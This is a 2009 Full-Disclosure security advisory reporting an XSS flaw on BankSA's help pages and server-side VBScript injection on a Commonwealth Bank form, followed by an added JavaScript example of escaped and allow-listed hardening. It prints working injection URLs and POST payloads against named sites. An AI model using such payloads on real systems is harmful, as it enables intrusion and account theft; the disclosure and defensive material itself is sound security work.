[Full-disclosure] Security Advisory: Banks in Australia

==============================================
Security Advisory: Banks in Australia
militan (Chia-Jun Lin)
militan.c7@xxxxxxxxx
adl.csie.ncu.edu.tw/~militan
militan-c7.blogspot.com
Advanced Defense Lab (ADL), NCU CSIE TAIWAN
12th May, 2009
==============================================

I. VULNERABILITY
-------------------------
XSS, command injection.

The banks below are vulnerable:
   BankSA             www.banksa.com.au
   Commonwealth Bank  www.commbank.com.au
   etc...
II. DESCRIPTION
-------------------------
Some banks have vulnerabilities in certain pages that attackers can misuse. Through the command injection, an attacker can execute arbitrary VBScript on the host.

In general, the security mechanisms of Australian banks' websites are in place. Their architectures, however, are more complex than they need to be, and in such large architectures some pages do not validate their input properly.
III. DETAIL & POC
-------------------------

1. BankSA: XSS (JavaScript injection)

   webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS

BBO stands for "Business Banking Online", and the vulnerable parameter is "origin". When origin=CBS, the page immediately redirects to:

   www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS

If, however, origin=CBS" is supplied (with a trailing double quote), the quote is written unescaped into the script that performs the redirect, closing the string literal early, and the page redirects incorrectly.

**** JavaScript code generated in the intermediate page ****
function focusWin() {
    window.focus();
    //var theUrl = window.location.pathname;
    //var pos = theUrl.indexOf("help.asp");
    //theUrl = theUrl.substr(0,pos);
    window.location.href = "http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"";
    //document.write(" http://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=CBS"");
}
window.>
****

Exploit:
   webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";%0a%0aalert(document.cookie);//
   webapps.banksa.com.au/bbo_help/?helpid=login_out&origin=CBS";}</script>%0a%0a<script>alert("Vulnerable")</script>

POC:
   http://adl.csie.ncu.edu.tw/~militan/banksa1.jpg
   http://adl.csie.ncu.edu.tw/~militan/banksa2.jpg
   http://adl.csie.ncu.edu.tw/~militan/banksa3.jpg

2. Commonwealth Bank: ASP command injection (server-side VBScript injection)

Commbank offers many tools for calculating and evaluating financial plans. The page below collects personal information and books an appointment:

   www.commbank.com.au/retirement/_PRODUCTION/content/ffthinkabout.asp

Almost all of its parameters are processed by VBScript on the server, and the page returns an error message when a parameter is mangled. An exploit is therefore easy to craft, and arbitrary VBScript commands can be executed on the server.

Exploit (POST parameter Whattodo, default value FillForm):
   FillForm & Response.write("ccccc")'
   FillForm & Response.write("ccccc") %0d%0a Response.write("kerker") '

POC:
   http://adl.csie.ncu.edu.tw/~militan/commbank1.jpg
   http://adl.csie.ncu.edu.tw/~militan/commbank2.jpg
   http://adl.csie.ncu.edu.tw/~militan/commbank4.jpg

IV. SOLUTION & CONCLUSION
-------------------------
Most banks in AU should cut down the enormous architecture of their websites: either do not provide additional functions, or make sure that those functions are secure.

The vulnerabilities have already been fixed.

regards
--
militan
Advanced Defense Lab, NCU Taiwan
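Added example (JavaScript, not code from militan's advisory or from either bank) contrasting the two vulnerable patterns behind the findings in section III with hardened forms: the origin value spliced into a generated script, and the Whattodo action string turned into executable code. The URL base, the KNOWN_ORIGINS set and the ACTIONS table are constructed stand-ins.

```javascript
// Added example, not code from the advisory or from either bank. It models
// the two defects in section III as small Node.js functions: a redirect
// parameter spliced into a generated script (BankSA) and an action
// parameter turned into executable code (Commonwealth Bank).

// Constructed stand-ins for the BBO user-guide route; not the bank's code.
const USER_GUIDE_BASE =
  "https://www.banksa.com.au/business/business-banking-online/user-guide/?source=applet&origin=";
const KNOWN_ORIGINS = new Set(["CBS"]);

// Vulnerable pattern: the query parameter is concatenated straight into a
// JavaScript string literal, so a double quote in it ends the literal early.
function renderRedirectUnsafe(origin) {
  return "function focusWin() {\n" +
         "  window.focus();\n" +
         '  window.location.href = "' + USER_GUIDE_BASE + origin + '";\n' +
         "}\n";
}

// Serialise a string as a JS literal that is also safe inside a <script>
// element: JSON.stringify escapes quotes and backslashes, and the angle
// brackets are escaped so "</script>" cannot close the element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e");
}

// Hardened: unknown origins are rejected instead of reflected, and the
// value that is reflected goes through jsStringLiteral.
function renderRedirectSafe(origin) {
  if (!KNOWN_ORIGINS.has(origin)) return null;
  return "function focusWin() {\n" +
         "  window.focus();\n" +
         "  window.location.href = " + jsStringLiteral(USER_GUIDE_BASE + origin) + ";\n" +
         "}\n";
}

// Server-side analogue of the Whattodo bug: pick a handler from a fixed
// table instead of assembling script source from the parameter.
const ACTIONS = { FillForm: () => "form filled" }; // constructed handler table
function dispatchAction(whattodo) {
  return Object.prototype.hasOwnProperty.call(ACTIONS, whattodo)
    ? ACTIONS[whattodo]()
    : "400 Bad Request";
}
```

The escaped literal round-trips to the original string when evaluated, so reflection stays possible where it is genuinely needed without the value ever leaving the string context.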
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia